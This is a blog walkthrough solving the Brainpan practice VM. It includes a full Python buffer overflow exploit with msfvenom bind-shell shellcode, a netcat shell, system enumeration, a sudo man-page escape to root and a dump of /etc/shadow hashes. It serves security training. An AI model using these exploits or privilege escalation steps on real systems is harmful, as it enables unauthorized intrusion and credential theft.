Thursday, November 21, 2013

Brainpan Pentest VM Solution

BRAINPAN PENTEST VM SOLUTION BY 1N3

                          
      `7MN.   `7MF'       
 __,    MMN.    M         
`7MM    M YMb   M  pd""b. 
  MM    M  `MN. M (O)  `8b
  MM    M   `MM.M      ,89
  MM    M     YMM    ""Yb.
.JMML..JML.    YM       88
                  (O)  .M'
                   bmmmd' 
                          


# OVERVIEW
Brainpan is a test VM solution used for Pentesting/Hacking simulations. For more info, go to http://blog.techorganic.com/2013/03/brainpan-hacking-challenge.html. This walk through covers the basic steps to obtain "root" access to brainpan.

# DISCOVER HOSTS
netdiscover -r 192.168.1.0/24
_____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
192.168.1.132   00:0c:29:90:72:0d    01    060   VMware, Inc.                                                                                                      

# PORT SCAN
nmap -sV 192.168.1.132
Nmap scan report for 192.168.1.132
Host is up (0.00041s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.25%I=7%D=11/6%Time=5279FCEC%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 00:0C:29:90:72:0D (VMware)

# DIRBUSTER
#scan 192.168.1.132:10000 with dirbuster
dirbuster & 

# dirbuster shows a static index.html page, a static image file, a bin directory and a brainpan.exe within the brainpan directory.

# DOWNLOAD brainpan.exe
wget http://192.168.1.132/bin/brainpan.exe

# RUN brainpan.exe FROM WINE...
wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[!] bind failed: 10048[+] bind done on port 9999
[+] waiting for connections.

* FROM THIS, WE CAN DETERMINE THAT brainpan.exe IS RUNNING IN WINE FOR LINUX ON PORT 9999/TCP ON THE REMOTE HOST...

# DEBUGGING & FUZZING
# Transfer brainpan.exe to a Windows XP machine for debugging using OllyGDB or Immunity Debugger. Find which bytes overwrite EIP, find suitable JMP ESP address. Use msfvenom to create bind shell for Linux using the brainpan IP. Create working buffer overflow exploit (see below).


# GENERATE UNIQUE BUFFER
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 1024
[*] exec: ruby pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B


#!/usr/bin/python
#Brainpan.exe fuzzer by 1N3 - 20131122


import socket

target = "192.168.1.119"

# 1024 bit unique string
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B"

print "Fuzzing port 9999 with " +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
s.close()


root@bt:/mnt/sdb/nonxero/scripts/fuzzers# ./brainpan_fuzz.py
Fuzzing port 9999 with 1024
Sending evil buffer...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
root@bt:/mnt/sdb/nonxero/scripts/fuzzers# 







msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 35724134
[*] exec: ruby pattern_offset.rb 35724134

[*] Exact match at offset 524  
* This means from 524-528 bytes, EIP is overwritten... 

# CONSTRUCT OUR SHELLCODE...
msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.1.132 LPORT=4444 -b "x00" -e x86/shikata_ga_nai
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)
buf =
"\xda\xcd\xd9\x74\x24\xf4\xbf\x7d\x7b\x06\xd9\x5d\x33\xc9" +
"\xb1\x14\x83\xed\xfc\x31\x7d\x15\x03\x7d\x15\x9f\x8e\x37" +
"\x02\xa8\x92\x6b\xf7\x05\x3f\x8e\x7e\x48\x0f\xe8\x4d\x0a" +
"\x2b\xab\x1f\x62\xce\x53\xb1\x2e\xa4\x43\xe0\x9e\xb1\x85" +
"\x68\x78\x9a\x88\xed\x0d\x5b\x17\x5d\x09\xec\x71\x6c\x91" +
"\x4f\xce\x08\x5c\xcf\xbd\x8c\x34\xef\x99\xe3\x48\x46\x63" +
"\x04\x20\x76\xbc\x87\xd8\xe0\xed\x05\x71\x9f\x78\x2a\xd1" +
"\x0c\xf2\x4c\x61\xb9\xc9\x0f"


# CREATE THE EXPLOIT...
# brainpan_exploit.py by 1N3 - 20131121

#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'
#                   bmmmd' 
#                          
#
#!/usr/bin/python


import socket
import os
import subprocess


# vars
target = "192.168.1.132"
buffer1 = '\x41' * 520
ebp = '\x90' * 4
EIP = "\xf3\x12\x17\x31" #311712F3 JMP ESP brainpan.exe
command = "nc -vv 192.168.1.132 4444"


#shellcode bind shell port 4444 192.168.1.132
shellcode = ("\xd9\xea\xd9\x74\x24\xf4\xbb\xda\x05\x64\xb7\x5a\x29\xc9" +
"\xb1\x14\x31\x5a\x19\x03\x5a\x19\x83\xc2\x04\x38\xf0\x55" +
"\x6c\x4b\x18\xc6\xd1\xe0\xb5\xeb\x5c\xe7\xfa\x8a\x93\x67" +
"\xa1\x0c\x7e\x0f\x54\xb1\x6f\x93\x32\xa1\xde\x7b\x4a\x20" +
"\x8a\x1d\x14\x6e\xcb\x68\xe5\x74\x7f\x6e\x56\x12\xb2\xee" +
"\xd5\x6b\x2a\x23\x59\x18\xea\xd1\x65\x47\xc0\xa5\xd3\x0e" +
"\x22\xcd\xcc\xdf\xa1\x65\x7b\x0f\x24\x1c\x15\xc6\x4b\x8e" +
"\xba\x51\x6a\x9e\x36\xaf\xed")


# NOOP sled
NOOP_sled = '\x90' * 104


# construct entire buffer - 1004 bytes
buffer = buffer1 + ebp + EIP + NOOP_sled + shellcode


print "**********************************************"
print "buffer1 length: " +str(len(buffer1))
print "EIP length: " +str(len(EIP))
print "shellcode length: " +str(len(shellcode))
print "NOOP_sled length: " +str(len(NOOP_sled))
print "Total buffer length: " +str(len(buffer))
print "**********************************************"
print "Fuzzing " + target + " on port 9999 with " +str(len(buffer)) + " bytes"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
print "Done..."
print "Connecting to bind shell..."
subprocess.call(command)
os.system(command)
print "Done..."
s.close()
exit


# EXPLOIT
root@bt:/scripts/fuzzers# ./brainpan_exploit.py
**********************************************
buffer1 length: 520
EIP length: 4
shellcode length: 105
NOOP_sled length: 104
Total buffer length: 737
**********************************************
Fuzzing 192.168.1.132 on port 9999 with 737 bytes
Sending evil buffer...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����� 1�����������������������������������������������������������������������������������������������������������t$���d�Z)ɱ 1Z Z �� 8�UlK �����\����g�
                               ~T�o�2��{J � n�h�tnV ���k*#Y ��eG��"��ߡe{$ �KQj�6�
Done...
Connecting to bind shell...

nc -vv 192.168.1.132 4444
whoami
puck
pwd
/home/puck/web


# DISTRO VERSION
cat /etc/release
Ubuntu 12.10

uname -a
Linux version 3.5.0-25-generic


# PROCESSES
ps -auxxx

 root       732     1  0 06:47 ?        00:00:00 /usr/sbin/winbindd -F
root       838   732  0 06:47 ?        00:00:00 /usr/sbin/winbindd -F
...
...
puck       910   909  0 06:47 ?        00:00:00 /bin/sh -c /home/puck/checksrv.sh
puck       911   910  0 06:47 ?        00:00:00 /bin/bash /home/puck/checksrv.sh
puck       926   911  0 06:47 ?        00:00:02 /usr/bin/python -m SimpleHTTPServer 10000
puck      1693     1  0 08:49 ?        00:00:00 /bin//sh
puck      1949     1  0 08:53 ?        00:00:00 /home/puck/web/bin/brainpan.exe
puck      1953     1  0 08:53 ?        00:00:00 /usr/bin/wineserver
puck      1959     1  0 08:53 ?        00:00:00 C:\windows\system32\services.exe
puck      1963     1  0 08:53 ?        00:00:00 C:\windows\system32\winedevice.exe MountMgr
puck      1972     1  0 08:53 ?        00:00:00 C:\windows\system32\plugplay.exe


# CRONTAB
cat /etc/crontab
# what can I do with this? file is owned by root and run by root but how to edit?
# m h  dom mon dow   command
* * * * * /home/puck/checksrv.sh


# SHOW LAST USERS TO LOGIN
#
last 
root     tty1                          Mon Mar  4 13:43 - 13:43  (00:00)
anansi   tty3                          Mon Mar  4 12:17 - 13:38  (01:20)
anansi   tty3                          Mon Mar  4 12:17 - 12:17  (00:00)
puck     tty3                          Mon Mar  4 11:30 - 12:17  (00:47)
puck     tty3                          Mon Mar  4 11:30 - 11:30  (00:00)
puck     tty2                          Mon Mar  4 11:07 - 13:38  (02:30)
puck     tty2                          Mon Mar  4 11:07 - 11:07  (00:00)
anansi   tty2                          Mon Mar  4 11:03 - 11:07  (00:04)
anansi   tty2                          Mon Mar  4 11:03 - 11:03  (00:00)
anansi   tty2                          Mon Mar  4 10:58 - 10:59  (00:01)
anansi   tty2                          Mon Mar  4 10:58 - 10:58  (00:00)
reynard  tty1                          Mon Mar  4 10:48 - 13:43  (02:54)
reynard  tty1                          Mon Mar  4 10:48 - 10:48  (00:00)


# USERS
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash


# SEARCH HOME DIRECTORY FILES
ls -lhaR /home/

/home/puck/.wine:
total 816K
drwxrwxr-x  4 puck puck 4.0K Nov 19 08:53 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
-rw-rw-r--  1 puck puck   11 Mar  4  2013 .update-timestamp
drwxrwxr-x  2 puck puck 4.0K Mar  4  2013 dosdevices
drwxrwxr-x  5 puck puck 4.0K Mar  4  2013 drive_c
-rw-rw-r--  1 puck puck 761K Nov 19 08:53 system.reg
-rw-rw-r--  1 puck puck  26K Nov 19 08:53 user.reg
-rw-rw-r--  1 puck puck 2.1K Mar  4  2013 userdef.reg


/home/puck/.wine/dosdevices:
total 8.0K
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
lrwxrwxrwx 1 puck puck   10 Mar  4  2013 c: -> ../drive_c
lrwxrwxrwx 1 puck puck    1 Mar  4  2013 z: -> /

/home/puck/.wine/drive_c:
total 20K
drwxrwxr-x  5 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x  4 puck puck 4.0K Nov 19 08:53 ..
drwxrwxr-x  4 puck puck 4.0K Mar  4  2013 Program Files
drwxrwxr-x  4 puck puck 4.0K Mar  4  2013 users
drwxrwxr-x 13 puck puck 4.0K Mar  4  2013 windows

/home/puck/.wine/drive_c/Program Files:
total 16K
drwxrwxr-x 4 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 5 puck puck 4.0K Mar  4  2013 ..
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 Common Files
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 Internet Explorer

/home/puck/.wine/drive_c/Program Files/Common Files:

/home/puck/web:
total 816K
drwxrwxr-x  3 puck puck 4.0K Mar  4  2013 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
drwxrwxr-x  2 puck puck 4.0K Mar  4  2013 bin
-rw-rw-r--  1 puck puck  215 Mar  4  2013 index.html
-rw-------  1 puck puck 797K Mar  4  2013 soss-infographic-final.png

/home/puck/web/bin:
total 32K
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 3 puck puck 4.0K Mar  4  2013 ..
-rwxr-xr-x 1 puck puck  21K Mar  4  2013 brainpan.exe

# What development tools/languages are installed/supported?
which perl
which python
/usr/bin/perl
/usr/bin/python

# How can files be uploaded?
which wget
which nc
which netcat
which scp
which ftp
/usr/bin/wget
/bin/nc
/bin/netcat
/usr/bin/scp
/usr/bin/ftp

# RUNNING PORTS/SERVICES
# Both services running as user 'puck'... not sure that will help me get root....

lsof -i:9999
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
brainpan. 1949 puck   10u  IPv4  26008      0t0  TCP *:9999 (LISTEN)
brainpan. 1949 puck   11u  IPv4  26008      0t0  TCP *:9999 (LISTEN)
wineserve 1953 puck   27u  IPv4  26008      0t0  TCP *:9999 (LISTEN)

lsof -i:10000
COMMAND PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
python  926 puck    3u  IPv4   8661      0t0  TCP *:webmin (LISTEN)

# RUNNING SERVICES LOCALLY
netstat -luntp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1756/brainpan.exe
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      924/python     
udp        0      0 0.0.0.0:39859           0.0.0.0:*                           -              
udp        0      0 0.0.0.0:68              0.0.0.0:*                           - what's this port do?              
udp6       0      0 :::22091                :::*     


# BREAK OUT OF NETCAT SHELL TO BASH SHELL
python -c 'import pty;pty.spawn("/bin/bash")'
puck@brainpan:/home/puck/privesc$ ls
ls
allfiles.tar.gz    linux_gather_files.sh  linux_privesc_check
linux_checksec.sh  linux_priv_esc.sh      out
puck@brainpan:/home/puck/privesc$  

# CHECK SUDO COMMANDS AVAILABLE
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin


User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util man ls
sudo /home/anansi/bin/anansi_util man ls
'unknown': unknown terminal type.

#  RUN SUDO COMMAND TO ENTER MAN PAGES
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual man

MAN(1)                        Manual pager utils                        MAN(1)


NAME
       man - an interface to the on-line reference manuals


SYNOPSIS
       man  [-C  file]  [-d]  [-D]  [--warnings[=warnings]]  [-R encoding] [-L
       locale] [-m system[,...]] [-M path] [-S list]  [-e  extension]  [-i|-I]
       [--regex|--wildcard]   [--names-only]  [-a]  [-u]  [--no-subpages]  [-P
       pager] [-r prompt] [-7] [-E encoding] [--no-hyphenation] [--no-justifi‐
       cation]  [-p  string]  [-t]  [-T[device]]  [-H[browser]] [-X[dpi]] [-Z]
       [[section] page ...] ...
       man -k [apropos options] regexp ...
       man -K [-w|-W] [-S list] [-i|-I] [--regex] [section] term ...
       man -f [whatis options] page ...
       man -l [-C file] [-d] [-D] [--warnings[=warnings]]  [-R  encoding]  [-L
       locale]  [-P  pager]  [-r  prompt]  [-7] [-E encoding] [-p string] [-t]
       [-T[device]] [-H[browser]] [-X[dpi]] [-Z] file ...
       man -w|-W [-C file] [-d] [-D] page ...
       man -c [-C file] [-d] [-D] page ...
       man [-hV]


DESCRIPTION
 Manual page man(1) line 1 (press h for help or q to quit)
DESCRIPTION
       man is the system's manual pager. Each page argument given  to  man  is
 Manual page man(1) line 2 (press h for help or q to quit)!/bin/bash


# TYPE !/bin/bash TO EXECUTE COMMANDS WITHIN MAN PAGE (WHICH WILL RUN AS "ROOT")
!/bin/bash

root@brainpan:/usr/share/man# whoami
whoami
root
root@brainpan:/usr/share/man#

# GATHER /etc/shadow file
root@brainpan:/usr/share/man# cat /etc/shadow
cat /etc/shadow
root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::
daemon:*:15768:0:99999:7:::
bin:*:15768:0:99999:7:::
sys:*:15768:0:99999:7:::
sync:*:15768:0:99999:7:::
games:*:15768:0:99999:7:::
man:*:15768:0:99999:7:::
lp:*:15768:0:99999:7:::
mail:*:15768:0:99999:7:::
news:*:15768:0:99999:7:::
uucp:*:15768:0:99999:7:::
proxy:*:15768:0:99999:7:::
www-data:*:15768:0:99999:7:::
backup:*:15768:0:99999:7:::
list:*:15768:0:99999:7:::
irc:*:15768:0:99999:7:::
gnats:*:15768:0:99999:7:::
nobody:*:15768:0:99999:7:::
libuuid:!:15768:0:99999:7:::
syslog:*:15768:0:99999:7:::
messagebus:*:15768:0:99999:7:::
reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::
anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::
